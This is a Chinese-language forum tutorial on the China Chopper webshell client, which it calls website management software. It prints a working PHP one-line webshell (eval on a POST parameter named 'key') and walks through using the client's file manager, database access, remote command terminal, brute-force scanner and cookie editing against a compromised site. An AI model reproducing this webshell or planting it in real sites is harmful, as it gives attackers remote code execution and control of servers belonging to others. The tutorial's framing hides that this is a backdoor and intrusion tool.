下载地址:
x01介绍
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科
菜刀的界面:
1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)
2019-9-26 17:15 上传
0x02使用
1.常见的管理
右键空白处->添加
1305452-20180808210020722-998899852.png (54.61 KB, 下载次数: 4)
2019-9-26 17:15 上传
添加SHELL -> 进行相关的配置。
1305452-20180808210036156-1398955441.png (12.29 KB, 下载次数: 0)
2019-9-26 17:15 上传
我的配置:
密码:key
脚本类型:PHP
最后->点击添加
相关的介绍:
这里的WEBSHELL是我们常说的一句话木马:
PHP一句话木马:<?php @eval($_POST['key']);?>
ASP一句话木马:
ASPX一句话木马:
眼尖的童鞋已经看到了三个里面都带有key这个单词,没错这个就是密码,大家可以自行修改为自己使用的密码。
功能概述:
1305452-20180808210046577-1258223498.png (12.29 KB, 下载次数: 2)
2019-9-26 17:15 上传
文件管理:
打开方式 [右键WEBSHELL->单击文件管理]
1305452-20180808210055104-2064821734.png (12.29 KB, 下载次数: 0)
2019-9-26 17:15 上传
管理方式 [右键上图中方框内的任何区域进行管理]
1305452-20180808210109166-1563096150.png (124.41 KB, 下载次数: 0)
2019-9-26 17:15 上传
数据库管理:
打开方式 [右键WEBSHELL->数据库管理]
1305452-20180808210123726-2073273432.png (21.88 KB, 下载次数: 3)
2019-9-26 17:15 上传
可以看到是空白的,这时候就需要配置数据库信息了。
配置方式1.[单击配置]
1305452-20180808210138415-1886545377.png (26.61 KB, 下载次数: 0)
2019-9-26 17:15 上传
出现了一个配置窗口。(前提你要有网站数据库的配置信息才可以进行配置)
我的配置信息:
数据库类型:Mysql
用户名:root
密码:root
配置方式 2.[选择数据库]
1305452-20180808210205065-396662724.png (96.78 KB, 下载次数: 2)
2019-9-26 17:15 上传
可以看到红色方框那边有MYSQL、MSSQL、MSSQL2、ORACLE等数据库类型。
我是Mysql的就选择mysql的示例:
1305452-20180808210214315-189550490.png (82.54 KB, 下载次数: 3)
2019-9-26 17:15 上传
配置后 [单击提交]:
1305452-20180808210224224-824408459.png (34.83 KB, 下载次数: 3)
2019-9-26 17:15 上传
管理方式:
1305452-20180808210233422-1079469945.png (56.53 KB, 下载次数: 4)
2019-9-26 17:15 上传
虚拟终端:
打开方式 [右键WEBSHELL->单击虚拟终端]
1305452-20180808210243113-656829796.png (19.43 KB, 下载次数: 2)
2019-9-26 17:15 上传
红色方框里是系统的一些信息。我们在D:\WWW\>后面输入相应的cmd命令即可(Linux就输入shell命令)
2.网站扫描
打开方式 [单击菜刀图标->单击网站扫描]
1305452-20180808210253928-616049855.png (8.26 KB, 下载次数: 4)
2019-9-26 17:15 上传
(也可以在软件里使用快捷键Alt+K去打开)
1305452-20180808210304595-1136674215.png (104.1 KB, 下载次数: 1)
2019-9-26 17:15 上传
使用方法:
功能:
1.反向IP(reverse_ip)
2.爬虫(spider)
3.爆破(crack)
其他按照这些提示都应该能懂就不一一去说了。
3.浏览器功能
1305452-20180808210318811-1711500403.png (2.21 KB, 下载次数: 3)
2019-9-26 17:15 上传
打开方法如上图示意。
1305452-20180808210328804-501134249.png (209.67 KB, 下载次数: 2)
2019-9-26 17:15 上传
对着网页进行右击:
1305452-20180808210340458-333792239.png (190.16 KB, 下载次数: 2)
2019-9-26 17:15 上传
上图是一些浏览器方面的功能。
单击扩展功能:
1305452-20180808210353606-1075738514.png (165.47 KB, 下载次数: 3)
2019-9-26 17:15 上传
可以进行cookie的修改。
同时也可以单击菜刀图标->浏览器:
1305452-20180808210403751-75499240.png (13.59 KB, 下载次数: 1)
2019-9-26 17:15 上传
可以进行选择:
#代表开启 可以单击进行取消开启。
4.其他功能
第一:设置菜刀启动密码(防止自己的WEBSHELL泄露出去)
1305452-20180808210416484-1281009235.png (4.93 KB, 下载次数: 3)
2019-9-26 17:15 上传
打开方式 [单击菜刀图标->单击设置启动密码]
1305452-20180808210423778-757521082.png (2.69 KB, 下载次数: 1)
2019-9-26 17:15 上传
点击是,就成功设置密码为test。
然后我们关掉菜刀再打开菜刀:
输入我们的密码再可以设置新的密码:
1305452-20180808210432011-2115132841.png (10.42 KB, 下载次数: 5)
2019-9-26 17:15 上传
我相信着点英语难不倒各位也不解释了。
也可以把启动密码取消掉:
1305452-20180808210446260-1282460312.png (4.25 KB, 下载次数: 1)
2019-9-26 17:15 上传
第二:日程提醒,使用方法如下:
1305452-20180808210505945-392898366.png (61.19 KB, 下载次数: 1)
2019-9-26 17:15 上传
1305452-20180808205953504-2012536036.png (24.98 KB, 下载次数: 1)
2019-9-26 17:15 上传